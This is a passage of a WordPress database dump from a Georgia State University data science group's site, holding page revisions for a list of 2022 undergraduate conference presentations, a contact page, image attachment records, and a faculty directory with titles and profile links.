00:43:34','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c8\",\"parentId\":\"449-c7\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c8\",\"index\":0,\"id\":\"449-c9\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c7\",\"parentId\":\"449-c6\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c6\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 20:43:34','2022-03-18 00:43:34','',497,'https://gsudice.dataconn.net/?p=514',0,'revision','',0),(515,1,'2022-03-17 20:43:34','2022-03-18 00:43:34','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"449-c6\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c6 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"449-c7\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c7 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c8-outer\">\n <div data-colibri-id=\"449-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"449-c9\" class=\"h-text h-text-component style-380 style-local-449-c9 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:43:34','2022-03-18 00:43:34','',449,'https://gsudice.dataconn.net/?p=515',0,'revision','',0),(521,1,'2022-03-17 20:51:16','2022-03-18 00:51:16','{\"name\":\"hop-content\",\"id\":\"449-c1\",\"partialId\":449,\"styleRef\":368,\"type\":\"content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"449-c8\",\"parentId\":\"449-c7\",\"partialId\":449,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"449-c8\",\"index\":0,\"id\":\"449-c9\",\"partialId\":449,\"styleRef\":380,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p><br><\\/p><p><br><\\/p><p><br><\\/p>\"}}],\"styleRef\":379,\"type\":\"content\"}],\"id\":\"449-c7\",\"parentId\":\"449-c6\",\"partialId\":449,\"styleRef\":378,\"type\":\"content\"}],\"id\":\"449-c6\",\"parentId\":\"449-c1\",\"partialId\":449,\"styleRef\":377,\"type\":\"content\"}]}','','','inherit','closed','closed','','497-revision-v1','','','2022-03-17 20:51:16','2022-03-18 00:51:16','',497,'https://gsudice.dataconn.net/?p=521',0,'revision','',0),(522,1,'2022-03-17 20:51:16','2022-03-18 00:51:16','<div data-colibri-id=\"449-c1\" class=\"style-368 style-local-449-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"449-c6\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-377 style-local-449-c6 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"449-c7\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-378 style-local-449-c7 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-379-outer style-local-449-c8-outer\">\n <div data-colibri-id=\"449-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-379 style-local-449-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"449-c9\" class=\"h-text h-text-component style-380 style-local-449-c9 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Schuh, E. 2022. Building a resilient energy grid: development of an urban-scale model for energy prediction. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Anand, A. 2022. Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>Garland, R. 2022. GSU (Georgia State University) Contact Networks and Interventions. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.</p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n <p>\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Presentations','','inherit','closed','closed','','449-revision-v1','','','2022-03-17 20:51:16','2022-03-18 00:51:16','',449,'https://gsudice.dataconn.net/?p=522',0,'revision','',0),(528,1,'2022-03-17 20:56:13','2022-03-18 00:56:13','','jason-goodman-vbxyFxlgpjM-unsplash','','inherit','open','closed','','jason-goodman-vbxyfxlgpjm-unsplash','','','2022-03-17 20:56:13','2022-03-18 00:56:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/jason-goodman-vbxyFxlgpjM-unsplash.jpg',0,'attachment','image/jpeg',0),(536,1,'2022-03-17 20:59:41','2022-03-18 00:59:41','','andrey-metelev-qpAOxji4dAo-unsplash','','inherit','open','closed','','andrey-metelev-qpaoxji4dao-unsplash','','','2022-03-17 20:59:41','2022-03-18 00:59:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/andrey-metelev-qpAOxji4dAo-unsplash.jpg',0,'attachment','image/jpeg',0),(537,1,'2022-03-17 20:59:52','2022-03-18 00:59:52','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-andrey-metelev-qpAOxji4dAo-unsplash-scaled-1.jpg','cropped-andrey-metelev-qpAOxji4dAo-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-andrey-metelev-qpaoxji4dao-unsplash-scaled-1-jpg','','','2022-03-17 20:59:52','2022-03-18 00:59:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-andrey-metelev-qpAOxji4dAo-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(545,1,'2022-03-17 21:06:39','2022-03-18 01:06:39','','colibri-image-103.png','','inherit','open','closed','','colibri-image-103-png','','','2022-03-17 21:06:39','2022-03-18 01:06:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-103.png',0,'attachment','image/png',0),(546,1,'2022-03-17 21:06:42','2022-03-18 01:06:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus. <\\/p><p>Phone: (404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c7\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','publish','closed','closed','','546','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=546',0,'extb_post_json','',0),(547,1,'2022-03-17 21:06:42','2022-03-18 01:06:42','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-399 style-local-185-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-399 style-local-185-c5\">\n <!---->\n <!---->\n <h4 class=\"\">DICE</h4>\n </div>\n </div>\n <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c6\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c21-outer\">\n <div data-colibri-id=\"185-c21\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-17 21:06:42','2022-03-18 01:06:42','',185,'https://gsudice.dataconn.net/?p=547',0,'revision','',0),(553,1,'2022-03-17 21:07:30','2022-03-18 01:07:30','','pawel-czerwinski--0xCCPIbl3M-unsplash','','inherit','open','closed','','pawel-czerwinski-0xccpibl3m-unsplash','','','2022-03-17 21:07:30','2022-03-18 01:07:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/pawel-czerwinski-0xCCPIbl3M-unsplash.jpg',0,'attachment','image/jpeg',0),(554,1,'2022-03-17 21:07:50','2022-03-18 01:07:50','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-pawel-czerwinski-0xCCPIbl3M-unsplash-scaled-1.jpg','cropped-pawel-czerwinski-0xCCPIbl3M-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-pawel-czerwinski-0xccpibl3m-unsplash-scaled-1-jpg','','','2022-03-17 21:07:50','2022-03-18 01:07:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-pawel-czerwinski-0xCCPIbl3M-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(555,1,'2022-03-17 21:07:54','2022-03-18 01:07:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":399,\"type\":\"content\",\"props\":{\"content\":\"DICE\"}},{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c7\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. <\\/p><p>Phone: (404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c21\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-03-17 21:07:54','2022-03-18 01:07:54','',546,'https://gsudice.dataconn.net/?p=555',0,'revision','',0),(556,1,'2022-03-17 21:07:54','2022-03-18 01:07:54','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-399 style-local-185-c5 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-399 style-local-185-c5\">\n <!---->\n <!---->\n <h4 class=\"\">DICE</h4>\n </div>\n </div>\n <div data-colibri-id=\"185-c6\" class=\"h-global-transition-all h-heading style-400 style-local-185-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-400 style-local-185-c6\">\n <!---->\n <!---->\n <h2 class=\"\">Contact Us</h2>\n </div>\n </div>\n <div data-colibri-id=\"185-c7\" class=\"h-text h-text-component style-401 style-local-185-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>We are located on the 18th Floor of 25 Park Place at Georgia State University downtown campus. </p>\n <p>Phone: (404) 919-0757\n <br>Email: dice@cs.gsu.edu</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c21-outer\">\n <div data-colibri-id=\"185-c21\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-03-17 21:07:54','2022-03-18 01:07:54','',185,'https://gsudice.dataconn.net/?p=556',0,'revision','',0),(562,1,'2022-03-17 21:10:48','2022-03-18 01:10:48','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health 